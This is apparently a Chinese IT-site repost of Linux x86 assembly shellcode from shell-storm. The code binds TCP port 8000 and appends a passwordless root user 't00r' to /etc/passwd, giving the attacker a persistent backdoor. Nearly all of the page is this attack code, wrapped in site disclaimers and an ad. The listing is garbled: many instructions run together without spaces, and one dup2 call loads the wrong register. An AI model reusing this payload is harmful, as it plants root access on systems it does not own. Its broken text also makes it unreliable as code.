免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!
; Title: Bindport TCP/8000 & execve add user with access root ; os: Linux x86 ; size: 225+ bytes ; IP: localhost ; Port: 8000 ; Use: nc localhost 8000 ; ; Author: Jonathan Salwan ; Mail: submit AT shell-storm.org ; Web: http://www.shell-storm.org ; ; ; More shellcodes in => http://www.shell-storm.org/shellcode/ ; section .text global _start _start: ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; pushbyte0x0 pushbyte0x1 pushbyte0x2 moveax, 0x66 movebx, 0x1 movecx, esp int 0x80 ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; mov edx, eax ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; pushbyte0x0 pushbyte0x0 pushbyte0x0 pushword0x401f pushword0x2 movebx, esp push byte0x10 pushebx pushedx moveax, 0x66 movebx, 0x2 movecx, esp int 0x80 ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; pushbyte0x1 pushedx moveax,0x66 movebx,0x4 movecx, esp int 0x80 ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; pushbyte0x0 pushbyte0x0 pushedx moveax, 0x66 movebx, 0x5 movecx, esp int 0x80 ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; movedx, eax ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; moveax, 0x3f movebx, edx mov ebx, 0x2 int0x80 mov eax, 0x3f mov ebx, edx mov ecx, 0x1 int 0x80 mov eax, 0x3f mov ebx, edx mov ecx, 0x0 int 0x80 ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; push byte 0x05 pop eax xor ecx, ecx push ecx push 0x64777373 push 0x61702f2f push 0x6374652f mov ebx, esp mov cx, 02001Q int0x80 ;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; mov ebx, eax ;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; push byte 0x04 pop eax xor edx, edx push edx pushword0x6873 push0x61622f6e push0x69622f3a push0x746f6f72 push0x2f3a746f push0x6f723a30 push0x3a303a3a push0x74303072 mov ecx, esp push byte 0x1f pop edx int 0x80 ;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; push byte 0x06 pop eax int 0x80 ;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; push byte 0x01 popeax int 0x80 |
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪! 免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作! |